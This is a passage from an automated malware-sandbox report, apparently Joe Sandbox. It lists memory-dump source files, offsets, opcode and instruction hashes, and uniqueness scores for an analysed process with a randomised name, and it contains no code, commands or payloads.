                                                                                        • Opcode Fuzzy Hash: 4ca36628ea0f343e1ed890640ad7718a5f8e3445ad3f42e70db5ccbd7725f7df
                                                                                        • Instruction Fuzzy Hash: 42F0903198E2CA9FE7169BF0C9615E97FB4AF03214F5904F6E085CB4B2C62C664AC761
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2937457782.00007FFD9C290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C290000, based on PE: false
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB5000, based on PE: false
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB5000, based on PE: false
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB5000, based on PE: false
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAD000, based on PE: false
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2937457782.00007FFD9C290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C290000, based on PE: false
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAD000, based on PE: false
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC88000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC88000, based on PE: false
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC88000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC88000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc88000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8f9e23db7711093ff3204458b67b621b305659c69b7f7706eb34c482d7da33ea
                                                                                        • Instruction ID: f141f5df57d9fd41098e5dfb4a3876d37350e35eb487a62b6bb7cc0c6da1611c
                                                                                        • Opcode Fuzzy Hash: 8f9e23db7711093ff3204458b67b621b305659c69b7f7706eb34c482d7da33ea
                                                                                        • Instruction Fuzzy Hash: D4C04840F0FA8A6AEB3296F008A507D06910B17240B560672E11A8A1E3E86C6A456A61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e291d069d006efcf43a58d36e8a4340d5918eff611ee7c28ce011526879cd27e
                                                                                        • Instruction ID: 460c98e4b27870d6b4fb0fd6e60575f27f6997afae9fc70d22f2398e8b4b9e12
                                                                                        • Opcode Fuzzy Hash: e291d069d006efcf43a58d36e8a4340d5918eff611ee7c28ce011526879cd27e
                                                                                        • Instruction Fuzzy Hash: D9B09200F0E20B86F23010F4086803C00810B49781BA20A30A20AE61E6DC8C2E001260
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ffc4feeed5d67da2f431a81c625bd3c0f197f172cefdf09a6d949af9ff1863ff
                                                                                        • Instruction ID: a829304be4034a8ca2a45a0ef8e002494907122a9c316275c01e5dbfb50822e0
                                                                                        • Opcode Fuzzy Hash: ffc4feeed5d67da2f431a81c625bd3c0f197f172cefdf09a6d949af9ff1863ff
                                                                                        • Instruction Fuzzy Hash: 08B00204F4E60BD7F53410F404750BC04811B86245B760E35D55B5A2F7DD5C3B411651
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a127916f9e9ee77f2908de0c4e9ea239c715b759c2d232d7798a4d81ade775f8
                                                                                        • Instruction ID: 40158d7cbc05fa8539fe8afaf7795a13f486a518a7344d9a5ba3a0d1a012b38a
                                                                                        • Opcode Fuzzy Hash: a127916f9e9ee77f2908de0c4e9ea239c715b759c2d232d7798a4d81ade775f8
                                                                                        • Instruction Fuzzy Hash: 9DB01200F0E20F93F57406F004F043C00C18B44240F921536D52B571F3DC8C3F102190
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2937457782.00007FFD9C290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C290000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9c290000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0b95888bf63b718944a67c99bdfb08774048f4565fda277a6f0524d5c731caac
                                                                                        • Instruction ID: 27c910794fab9f5a49a007866265d8f2910574576d6b44454965cad18a3c64be
                                                                                        • Opcode Fuzzy Hash: 0b95888bf63b718944a67c99bdfb08774048f4565fda277a6f0524d5c731caac
                                                                                        • Instruction Fuzzy Hash: 94B09260A0910B8AE720EF90CA602AD76B1AF04384F100835A209A22C1CE3828008744
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%